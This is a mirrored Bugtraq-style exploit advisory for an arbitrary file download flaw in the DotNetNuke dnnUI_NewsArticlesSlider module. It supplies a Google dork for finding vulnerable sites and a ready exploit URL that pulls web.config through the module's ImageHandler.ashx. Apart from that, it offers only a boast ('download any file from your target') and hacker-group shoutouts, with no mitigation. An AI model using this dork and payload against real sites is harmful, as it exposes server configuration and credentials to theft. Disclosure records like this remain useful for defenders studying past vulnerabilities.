DNN (DotNetNukeĀ®) dnnUI_NewsArticlesSlider Module Arbitrary File- Download Vulnerability

From: cseye_ut@yahoo.com
To: bugtraq@securityfocus.com
Cc:
Subject: DNN (DotNetNukeĀ®) dnnUI_NewsArticlesSlider Module Arbitrary File- Download Vulnerability
Date:


#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : DNN (DotNetNuke) dnnUI_NewsArticlesSlider Module Arbitrary File Download Vulnerability
# Author : alieye
# vendor : http://www.dnnui.com/ , http://store.dnnsoftware.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
# Google Dork: inurl:/dnnUI_NewsArticlesSlider/
# Version: all version
# Date: 09/06/2014
# os : windows server 2008
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++



You can download any file from your target ;)


Exploit : http://victim.com/DesktopModules/dnnUI_NewsArticlesSlider/ImageHandler.ashx?img=~/web.config

#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To ZOD14C , 4l130h1 , bully13 , andelos , 3.14nnph , f4rm4nd3 and all cseye members
[#] Thanks To All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++





Copyright Ā© 1995-2020 LinuxRocket.net. All rights reserved.